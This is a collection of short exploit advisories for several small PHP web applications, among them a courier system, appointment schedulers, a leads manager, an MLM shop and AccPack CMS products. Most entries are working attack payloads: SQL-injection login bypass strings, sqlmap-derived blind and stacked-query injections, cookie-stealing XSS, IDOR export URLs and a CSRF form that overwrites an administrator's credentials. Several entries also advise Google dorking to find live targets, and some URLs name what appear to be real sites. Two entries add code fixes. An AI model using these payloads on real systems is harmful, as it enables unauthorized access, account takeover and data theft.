<pre><code>=============================================================================================================================================<br />| # Title : Best Courier Management System v1.0 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : user : 'or''='@gmail.com & pass = 'or''='<br /><br />[+] Panel : http://127.0.0.1/gaatitrack/login.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Appointment Scheduler v4.0 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://auth.phpjabbers.com/download/727641/53089/d9b13cca42bb941a9f06d96f22fb7743 |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Direct Object Reference : Allows you as a visitor to access the control panel without permissions.<br /><br />[+] use payload : index.php?controller=pjAdminBookings&action=pjActionExport<br /><br />[+] http://127.0.0.1/AppointmentSchedulerDe/index.php?controller=pjAdminBookings&action=pjActionExport<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code># Exploit Title: Tourism Management System v2.0 - Cross Site Scripting (XSS)<br /># Date: 13 July 2024<br /># Exploit Author: Sampath kumar kadajari<br /># Vendor Homepage: https://phpgurukul.com/tourism-management-system-free-download/<br /># Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=7204 <br /># Version: v2.0<br /># CVE: CVE-2024-41333<br /># Tested on: Windows, XAMPP, Apache, MySQL<br /><br />-------------------------------------------------------------------------------------------------------------------------------------------<br /><br />A reflected cross-site scripting (XSS) vulnerability in Phpgurukul Tourism Management System v2.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload into the uname parameter.<br /><br /><br /><br />"Vulnerable Code" – (/admin/user-bookings.php)<br /><br /><h2>Manage <?php echo $_GET['uname'];?>'s Bookings</h2><br /><br /><br /><br />---> Affected Component: http://localhost/tms/admin/user-bookings.php?uid=manju@gmail.com&&uname=%22%3E%3Cimg%20src/onerror=prompt(document.cookie)%3E <br /><br /><br /><br />"Fix for Vulnerable Code" <br /><br /><h2>Manage <?php echo htmlspecialchars($_GET['uname'], ENT_QUOTES, 'UTF-8'); ?>'s Bookings</h2><br /></code></pre>
<pre><code># Exploit Title: Computer Laboratory Management System v1.0 - Incorrect access control<br /># Date: 08 July 2024<br /># Exploit Author: Sampath kumar kadajari<br /># Vendor Homepage: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html<br /># Software Link: https://www.sourcecodester.com/download-code?nid=17268&title=Computer+Laboratory+Management+System+using+PHP+and+MySQL<br /># Version: v1.0<br /># CVE: CVE-2024-41332<br /># Tested on: Windows, XAMPP, Apache, MySQL<br /><br />-------------------------------------------------------------------------------------------------------------------------------------------<br /><br />Incorrect access control in the delete_category function of Sourcecodester Computer Laboratory Management System v1.0 allows authenticated attackers with low-level privileges to perform arbitrarily delete actions. <br /><br /><br />"Vulnerable Code" – ( classes/master.php)<br /><br />function delete_category(){<br /> extract($_POST);<br /> $del = $this->conn->query("UPDATE `category_list` set `delete_flag` = 1 where id = '{$id}'");<br /> if($del){<br /> $resp['status'] = 'success';<br /> $this->settings->set_flashdata('success'," Category successfully deleted.");<br /> }else{<br /> $resp['status'] = 'failed';<br /> $resp['error'] = $this->conn->error;<br /> }<br /> return json_encode($resp);<br />}<br /><br />---> Affected Component: http://localhost/php-lms/classes/Master.php?f=delete_category<br /><br />"Fix for Vulnerable Code":<br /><br />function delete_category(){<br /> // Check if the user is logged in and has an admin role<br /> if (!isset($_SESSION['userdata']['role']) || $_SESSION['userdata']['role'] != 'admin') {<br /> $resp['status'] = 'failed';<br /> $resp['error'] = 'Unauthorized access.';<br /> return json_encode($resp);<br /> }<br /><br /> // Proceed with the delete action if authorized<br /> extract($_POST);<br /> $del = $this->conn->query("UPDATE `category_list` set `delete_flag` = 1 where id = '{$id}'");<br /> if($del){<br /> $resp['status'] = 'success';<br /> $this->settings->set_flashdata('success',"Category successfully deleted.");<br /> }else{<br /> $resp['status'] = 'failed';<br /> $resp['error'] = $this->conn->error;<br /> }<br /> return json_encode($resp);<br />}<br /></code></pre>
<pre><code>[x]========================================================================================================================================[x]<br /> | Title : Leads Manager Tool SQL & XSS[stored)] Vulnerabilities<br /> | Software : Leads Manager Tool Using PHP and MySQL with Source Code<br /> | Create By : https://www.sourcecodester.com/users/remyandrade<br /> | First Release: 25/01/22<br /> | Download : https://www.sourcecodester.com/php/17510/leads-manager-tool-using-php-and-mysql-source-code.html<br /> | Date : 30 Agustus 2024<br /> | Author : OoN_Boy<br />[x]========================================================================================================================================[x]<br /> | Technology : PHP<br /> | Database : MySQL<br /> | Price : FREE<br /> | Description : Leads Manager Tool, a comprehensive web application designed to streamline the process of managing business leads. Built with the power of PHP and MySQL, this tool offers a seamless and user-friendly experience for storing, updating, and organizing lead information<br />[x]========================================================================================================================================[x]<br /><br />[O] Exploit<br /> <br /> http://localhost/leads-manager-tool/endpoint/delete-leads.php?leads=[SQL]<br /> http://localhost/leads-manager-tool/endpoint/add-leads.php<br /> <br />[O] Proof of concept<br /><br /> [SQL]<br /> Parameter: leads (GET) <br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause<br /> Payload: leads= --emurate' RLIKE (SELECT (CASE WHEN (8305=8305) THEN 0x202d2d656d7572617465 ELSE 0x28 END))-- rUwl<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: leads= --emurate' OR (SELECT 1382 FROM(SELECT COUNT(*),CONCAT(0x7162787171,(SELECT (ELT(1382=1382,1))),0x7176706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- vKls<br /><br /> Type: stacked queries<br /> Title: MySQL >= 5.0.12 stacked queries (comment)<br /> Payload: leads= --emurate';SELECT SLEEP(5)#<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: leads= --emurate' AND (SELECT 1244 FROM (SELECT(SLEEP(5)))fAev)-- ZNBt<br /> <br /> [XSS] <br /> POST /leads-manager-tool/endpoint/add-leads.php HTTP/1.1<br /> Host: 127.0.0.1<br /> Accept-Encoding: gzip, deflate, br<br /> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br /> Accept-Language: en-US;q=0.9,en;q=0.8<br /> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36<br /> Connection: close<br /> Cache-Control: max-age=0<br /> Origin: http://127.0.0.1<br /> Upgrade-Insecure-Requests: 1<br /> Referer: http://127.0.0.1/leads-manager-tool/<br /> Content-Type: application/x-www-form-urlencoded<br /> Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="126", "Chromium";v="126"<br /> Sec-CH-UA-Platform: Windows<br /> Sec-CH-UA-Mobile: ?0<br /> Content-Length: 85<br /><br /> leads_name=Vrs<script>alert(1)</script>Hck&email_add=vrs-hck@maho.id&phone_number=911-911-9111<br /> <br />[x]========================================================================================================================================[x]<br /><br />[O] Greetz<br /><br />BatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^<br /><br />[x]========================================================================================================================================[x]<br /><br /><br /></code></pre>
<pre><code>[x]========================================================================================================================================[x]<br /> | Title : Readymade Unilevel Ecommerce MLM Blind SQL & XSS Vulnerabilities<br /> | Software : Readymade Unilevel Ecommerce<br /> | Last Update : 15/03/24 [TESTED VERSION SCRIPT]<br /> | First Release: 16/11/21<br /> | Vendor : http://www.i-netsolution.com/<br /> | Date : 01 Agustus 2024<br /> | Author : OoN_Boy<br />[x]========================================================================================================================================[x]<br /> | Technology : PHP<br /> | Database : MySQL<br /> | Price : $500<br /> | Description : MLM Unilevel Plan Script developed by experts and professionals. Rather than building your business from the scratch, make use of our Unilevel MLM PHP Script to launch your MLM business.<br />[x]========================================================================================================================================[x]<br /><br />[O] Exploit<br /> <br /> http://localhost/eommlm/product-details.php?id=11[SQL]<br /> http://localhost/ecomlm/product-details.php?id=11[XSS]<br /> <br />[O] Proof of concept<br /> <br /> sqlmap.py -u "http://localhost/eommlm/product-details.php?id=11" --invalid-string<br /> <br /> [SQL]<br /> Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: id=11 AND 1189=1189<br /><br /> Type: stacked queries<br /> Title: MySQL >= 5.0.12 stacked queries (comment)<br /> Payload: id=11;SELECT SLEEP(10)#<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: id=11 AND (SELECT 6812 FROM (SELECT(SLEEP(10)))DddL)<br /><br /> <br /> [XSS] <br /> http://localhost/ecomlm/product-details.php?id=11"><img/src/onerror=.1|alert`VrsHckGAY`+class=VrsHckGAY><br /> <br />[x]========================================================================================================================================[x]<br /><br />[O] Greetz<br /><br />BatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^<br /><br />[x]========================================================================================================================================[x]<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Appointment Scheduler v3.0 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://auth.phpjabbers.com/download/727641/53089/d9b13cca42bb941a9f06d96f22fb7743 |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Direct Object Reference : Allows you as a visitor to access the control panel without permissions.<br /><br />[+] use payload : index.php?controller=pjAdminBookings&action=pjActionExport<br /><br />[+] http://127.0.0.1/www/ wongkit.com.hk/appointment/index.php?controller=pjAdminBookings&action=pjActionExport<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : AccPack Cop v1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://webpay.com.np/#Product |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following HTML code modifies the admin information.<br /><br />[+] Go to the line 5. Set the target site link Save changes and apply . <br /><br />[+] infected file : cms/user/modify.php.<br /><br />[+] http://127.0.0.1/q7.3/cms/user/modify.php.<br /><br />[+] save code as poc.html <br /><br />[+] payload : <br /><br /></head><br /><body><br /> <div class="container"><br /> <div class="text-center" style="padding: 5px"><h3>User Edit</h3></div><br /> <form action="https://tssclahanorgnp/cms/user/modify.php" method="POST" enctype="multipart/form-data"><br /> <div hidden="true"><br /> <input type="text" name="id" id="id" value="1"><br /> </div><br /> <div><br /> <label for='email'>Email</label><input type="text" class="form-control" name='email' id='email' value="indoushka@mail.dz"><br /> </div><br /> <div><br /> <label for='password'>Password</label><input type="text" class="form-control" name='password' id='password' type='password' value="123456"><br /> </div><br /> <tr><br /> <div><br /> <label for='status'>Status</label><br /> <input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label><br /> <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label><br /> <br /> </div> <br /> <div style='height:80'><br /> <input type='submit' value='Submit'><input type='reset' Value='Reset'><br /> </div><br /> </form><br /> </div><br /><br /></body><br /></html><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : AccPack Buzz v1.0 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://webpay.com.np/#Product |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : user & pass = ' or 0=0 ##<br /><br />[+] Panel : http://127.0.0.1/jamiatulamanepal.orgnp/cms/<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Availability Calendar v5.0 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://auth.phpjabbers.com/download/727464/53089/4086bea551934539d536dcb3899ddbe8 |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Direct Object Reference : Allows visitors to preview Calendar .<br /><br />[+] use payload : preview.php?cid=all&locale=<br /><br />[+] http://127.0.0.1/AvailabilityCalendar/preview.php?cid=all&locale=<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>